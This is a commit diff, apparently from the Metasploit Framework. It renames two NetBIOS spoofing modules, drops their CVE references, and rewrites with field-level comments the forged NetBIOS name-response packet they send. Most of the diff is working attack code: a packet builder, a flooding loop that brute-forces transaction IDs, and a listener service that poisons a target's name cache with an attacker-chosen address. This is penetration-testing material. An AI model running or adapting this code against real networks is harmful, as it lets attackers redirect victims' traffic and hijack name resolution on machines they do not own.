Rework to clarify that this a brute force spoof, unrelated to BadTunnel

2016-06-19 13:36:39 -05:00 · 2016-06-19 13:36:39 -05:00 · ce7c6496dd
parent 6507e520c7
commit ce7c6496dd
2 changed files with 48 additions and 48 deletions
--- a/modules/auxiliary/admin/netbios/netbios_badtunnel_direct.rb
+++ b/modules/auxiliary/admin/netbios/netbios_badtunnel_direct.rb
@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'        => 'NetBIOS "BadTunnel" Name Poisoner (Direct)',
+      'Name'        => 'NetBIOS Response Brute Force Spoof (Direct)',
      'Description'    => %q{
          This module continuously spams NetBIOS responses to a target for given hostname,
        causing the target to cache a malicious address for this name. On high-speed local
@ -21,19 +21,11 @@ class MetasploitModule < Msf::Auxiliary
        rates for a successful attack.
      },
      'Authors'     => [
+        'vvalien',   # Metasploit Module (post)
        'hdm',       # Metasploit Module
-        'tombkeeper' # Vulnerability Discovery
+        'tombkeeper' # Related Work
      ],
      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['URL', 'http://xlab.tencent.com/en/2016/06/17/BadTunnel-A-New-Hope/'],
-          ['CVE', '2016-3213'],
-          ['MSB', 'MS16-063'],
-          ['CVE', '2016-3236'],
-          ['MSB', 'MS16-077']
-        ],
-      'DisclosureDate' => 'Jun 14 2016'
    )

    register_options(
@ -49,17 +41,27 @@ class MetasploitModule < Msf::Auxiliary

  def netbios_spam
    payload =
-      "\xff\xff" + # TXID
-      "\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00\x20" +
-      Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
-      "\x00\x00\x20\x00\x01\x00\xff\xff\xff\x00\x06\x00\x00" +
-      Rex::Socket.addr_aton(@fake_addr)
+        "\xff\xff"   + # TX ID (will brute force this)
+        "\x85\x00"   + # Flags = response + authoratative + recursion desired
+        "\x00\x00"   + # Questions = 0
+        "\x00\x01"   + # Answer RRs = 1
+        "\x00\x00"   + # Authority RRs = 0
+        "\x00\x00"   + # Additional RRs = 0
+        "\x20"       +
+        Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
+        "\x00"       +
+        "\x00\x20"   + # Type = NB 
+        "\x00\x01"   + # Class = IN
+        "\x00\x04\x93\xe0" + # TTL long time
+        "\x00\x06"   + # Datalength = 6
+        "\x00\x00"   + # Flags B-node, unique
+        Rex::Socket.addr_aton(@fake_addr)

    stime = Time.now.to_f
    pcnt = 0
    pps  = 0

-    print_status("BadTunnel:  >> Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
+    print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")

    live = true
    while live
@ -74,14 +76,14 @@ class MetasploitModule < Msf::Auxiliary
            sleep(0.01)
          end
        rescue Errno::ECONNREFUSED
-          print_error("BadTunnel:  >> Error: Target sent us an ICMP port unreachable, port is likely closed")
+          print_error("Error: Target sent us an ICMP port unreachable, port is likely closed")
          live = false
          break
        end
      end
    end

-    print_status("BadTunnel:  >> Cleaning up...")
+    print_status("Cleaning up...")
  end

  def run
--- a/modules/auxiliary/server/netbios_spoof_nat.rb
+++ b/modules/auxiliary/server/netbios_spoof_nat.rb
@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'        => 'NetBIOS "BadTunnel" Service',
+      'Name'        => 'NetBIOS Response Brute Force Spoof (NAT Tunnel)',
      'Description'    => %q{
          This module listens for a NetBIOS name request and then continuously spams
        NetBIOS responses to a target for given hostname, causing the target to cache
@ -25,18 +25,11 @@ class MetasploitModule < Msf::Auxiliary
        to access a UNC link pointing to the same address (HTML, Office attachment, etc).
      },
      'Authors'     => [
-        'hdm',       # Metasploit Module
-        'tombkeeper' # Vulnerability Discovery
+        'vvalien',   # Metasploit Module (post)
+        'hdm',       # Metasploit Module 
+        'tombkeeper' # Related Work
      ],
      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['URL', 'http://xlab.tencent.com/en/2016/06/17/BadTunnel-A-New-Hope/'],
-          ['CVE', '2016-3213'],
-          ['MSB', 'MS16-063'],
-          ['CVE', '2016-3236'],
-          ['MSB', 'MS16-077']
-        ],
      'Actions'     =>
        [
          [ 'Service' ]
@ -46,7 +39,6 @@ class MetasploitModule < Msf::Auxiliary
          'Service'
        ],
      'DefaultAction'  => 'Service',
-      'DisclosureDate' => 'Jun 14 2016'
    )

    register_options(
@ -65,7 +57,6 @@ class MetasploitModule < Msf::Auxiliary
    # MacOS X workaround
    ::Socket.do_not_reverse_lookup = true

-    print_status("NetBIOS 'BadTunnel' service is initializing")
    @sock = ::UDPSocket.new()
    @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
    @sock.bind(datastore['SRVHOST'], @port)
@ -74,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
    @fake_name = datastore['NBNAME']
    @fake_addr = datastore['NBADDR']

-    print_status("BadTunnel: Listening for NetBIOS requests...")
+    print_status("Listening for NetBIOS requests...")

    begin
      loop do
@ -86,7 +77,8 @@ class MetasploitModule < Msf::Auxiliary
        break
      end

-      print_status("BadTunnel:  >> Received a NetBIOS request from #{@targ_addr}:#{@targ_port}")
+      # TODO: Seed our counter based on the TXID of this request
+      print_status("Received a NetBIOS request from #{@targ_addr}:#{@targ_port}")
      @sock.connect(@targ_addr, @targ_port)

      netbios_spam
@ -94,25 +86,35 @@ class MetasploitModule < Msf::Auxiliary
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
-      print_error("BadTunnel: Error #{e.class} #{e} #{e.backtrace}")
+      print_error("Error #{e.class} #{e} #{e.backtrace}")
    ensure
-      @sock.close
+      @sock.close if @sock
    end
  end

  def netbios_spam
    payload =
-      "\xff\xff" + # TXID
-      "\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00\x20" +
-      Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
-      "\x00\x00\x20\x00\x01\x00\xff\xff\xff\x00\x06\x00\x00" +
-      Rex::Socket.addr_aton(@fake_addr)
+        "\xff\xff"   + # TX ID (will brute force this)
+        "\x85\x00"   + # Flags = response + authoratative + recursion desired
+        "\x00\x00"   + # Questions = 0
+        "\x00\x01"   + # Answer RRs = 1
+        "\x00\x00"   + # Authority RRs = 0
+        "\x00\x00"   + # Additional RRs = 0
+        "\x20"       +
+        Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
+        "\x00"       +
+        "\x00\x20"   + # Type = NB 
+        "\x00\x01"   + # Class = IN
+        "\x00\x04\x93\xe0" + # TTL long time
+        "\x00\x06"   + # Datalength = 6
+        "\x00\x00"   + # Flags B-node, unique
+        Rex::Socket.addr_aton(@fake_addr)

    stime = Time.now.to_f
    pcnt = 0
    pps  = 0

-    print_status("BadTunnel:  >> Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
+    print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")

    live = true
    while live
@ -127,20 +129,16 @@ class MetasploitModule < Msf::Auxiliary
            sleep(0.01)
          end
        rescue Errno::ECONNREFUSED
-          print_error("BadTunnel:  >> Error: Target sent us an ICMP port unreachable, port is likely closed")
+          print_error("Error: Target sent us an ICMP port unreachable, port is likely closed")
          live = false
          break
        end
      end
    end
-
-    print_status("BadTunnel:  >> Cleaning up...")
  end

  def run
-    loop do
-      netbios_service
-    end
+    loop { netbios_service }
  end

 end